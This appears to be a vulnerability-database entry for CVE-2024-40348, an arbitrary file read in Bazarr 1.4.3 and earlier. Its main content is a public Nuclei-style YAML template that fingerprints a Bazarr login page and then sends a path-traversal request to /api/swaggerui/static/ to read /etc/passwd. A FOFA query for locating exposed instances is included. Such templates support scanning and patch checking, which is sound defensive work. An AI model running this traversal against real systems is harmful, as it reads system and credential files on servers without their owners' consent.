漏洞描述
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
CVE-2024-40348: Bazarr < 1.4.3 - Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-40348
info:
name: Bazarr < 1.4.3 - Arbitrary File Read
author: s4e-io
severity: high
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/
- https://github.com/bigb0x/CVE-2024-40348
classification:
epss-score: 0.91611
epss-percentile: 0.99665
metadata:
verified: true
max-request: 2
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: cve,cve2024,bazarr,lfi
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
part: body
words:
- "<title>Bazarr</title>"
- 'content="Bazarr'
- "window.Bazarr"
condition: or
internal: true
- method: GET
path:
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4b0a00483046022100d7e10de4ef7d52d80eff6e775c147ba051365ea3374eb3e9dbc623bcb2be98b1022100f6569521cb0f0a037da29abc8ad13092066a5b8da17d1606ceb11149deb50766:922c64590222798bb761d5b6d8e72950